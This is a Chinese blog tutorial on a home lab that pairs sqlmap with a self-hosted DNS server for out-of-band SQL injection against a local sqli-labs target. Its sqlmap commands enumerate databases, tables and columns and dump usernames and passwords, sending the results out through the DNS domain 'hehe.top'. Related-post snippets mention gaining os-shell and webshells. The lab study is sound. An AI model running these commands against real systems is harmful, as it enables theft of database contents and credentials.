sqlmap结合dnslog外带注入

最新推荐文章于 2024-02-21 21:59:35 发布
最新推荐文章于 2024-02-21 21:59:35 发布
阅读量593 收藏 1
点赞数
分类专栏: SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/newlife1441/article/details/126155540
版权

目录

📓前言

📓操作步骤

1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置

2.环境准备

2.1Windows server2008 

2.1.1搭建dns服务器

2.2测试

2.2.1设置靶机的网络的dns为server2008

2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 

2.2.3server2008中创建转发器

2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况

2.3开始sqlmap使用dnslog外带注入

2.3.1取库 

2.3.2取表

2.3.3取users表的列

2.3.4取表users数据

📓前言

  • 在最近学习了sql注入的时间盲注后,感觉使用它效率还是不够快,我们这时就可以使用外带注入了,大致就是自己搭建一个dnslog平台,或者使用一个现成的在线平台,比如ceye,然后sqlmap执行的时候加上--dns-domain=xxxx.com 参数就可以,但是使用平台时你可以通过手工注入后在平台看到回显,下面将演示通过一台Windows server 2008(i192.168.78.169)和kali(192.168.78.156)还有一台win11(192.168.78.175),来实现sqlmap的dns外带注入

📓操作步骤

1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置

show variables like '%secure%';
#当secure_file_priv为空,就可以读取磁盘的目录。
#当secure_file_priv为G:\,就可以读取G盘的文件。
#当secure_file_priv为null,load_file就不能加载文件。

phpstudy中在D:\phpstudy_pro\Extensions\MySQL5.7.26下找到my.ini打开添加一条secure_file_priv=""

  

Phpstudy_pro搭建sqllabs靶场_会伏地的向日葵的博客-CSDN博客这篇博客介绍我在使用小皮桌面系统搭建SQLlabs靶场时遇到的可笑问题(纯属个人菜的原因),主要遇到的问题在数据库连接这里报了许多问题,比如数据库安全性问题,数据库用户创建表时的权限问题,归根结底就是我在搭建网点时自己手动创建了一个只有普通权限的数据库,导致后面出现了许许多多的问题,这里我将介绍一下我的搭建过程。...............https://blog.csdn.net/newlife1441/article/details/125875578?

2.环境准备

2.1Windows server2008 

2.1.1搭建dns服务器

            

2.2测试

2.2.1设置靶机的网络的dns为server2008

 

2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 

2.2.3server2008中创建转发器

 

2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况

 

2.3开始sqlmap使用dnslog外带注入

2.3.1取库 

#注入查库
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domaim "hehe.top" --dbs

2.3.2取表

#获取表
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" --tables

2.3.3取users表的列

#查列
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" --columns

2.3.4取表users数据

#取列值
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" -C "username,password" --dump

 

会伏地的向日葵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 313
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
sqlmap注入漏洞测试
02-22
资源内容:sqlmap注入漏洞测试
【渗透练习系列】DVWA的一次登录后通过Sqlmap拿到os-shell,命令执行写入一句话-01
书山上的云的博客
01-19 4249
一、前言 本次将通过DVWA靶机来展示怎样通过Sqlmap获取目标os-shell,得到命令执行权限,从而写入一句话木马,持续控制目标服务器。 二、测试 1.打开目标站点:http://192.200.30.126/DVWA/login.php,从网页后缀和wappalyzer浏览器插件来看,站点的编程语言为PHP。 2.输入账号跟密码登录后台,同时开启Burp抓取http包。 获取登录后的Cookie值: 3.找到存在SQL注入的模块。获取URL。 http://192.200.30.126/DVWA/v
sqlmap结合dnslog快速注入
weixin_67259816的博客
05-22 648
该文章记录了搭建dns服务器,和使用sqlmap结合dnslog快速注入数据
SQL注入DNSLog外带注入
dragon的博客
02-21 1217
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
sqlmap + dnslog外带数据:
CYLK1987310466的博客
08-06 980
sqlmap dnslog外带数据
sqlmap sql 注入测试工具
最新发布
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sql注入sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 1868
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
DNS外带注入SQLMAP
qq_31088019的博客
08-06 531
dns外带数据
DNSlog外带
adaosanqian的博客
02-28 7130
减轻盲注的复杂操作,运用DNSlog外带来进行操作
DNSlog外带原理及注入分析
热门推荐
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 684
SQL注入——DNSlog注入
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 649
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 1987
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
sqlmap从txt文件注入
07-29
回答: 使用sqlmap从txt文件注入可以通过以下命令实现:sqlmap -r /usr/a.txt。这个命令将从文本文件中获取http请求,并用于注入点在POST表单中。\[1\]在这个过程中,sqlmap会自动检测注入点并执行相应的注入操作。如果你想要执行多条语句进行注入,可以使用参数-m,例如sqlmap -m /usr/b.txt。\[1\]这样可以针对多条语句进行注入操作。另外,如果你想要将注入结果保存到本地文件中,可以使用--file-write参数,例如--file-write /test/test.txt --file-dest /var/www/html/1.txt。\[2\]如果你想要执行指定的SQL语句,可以使用--sql-query参数,例如--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"。\[3\]这样可以执行指定的SQL语句并获取相应的结果。 #### 引用[.reference_title] - *1* [HTTP文件头注入sqlmap的简单使用](https://blog.csdn.net/bwxzdjn/article/details/123618500)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [sqlmapsql注入原理利用](https://blog.csdn.net/m0_55313512/article/details/123158406)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值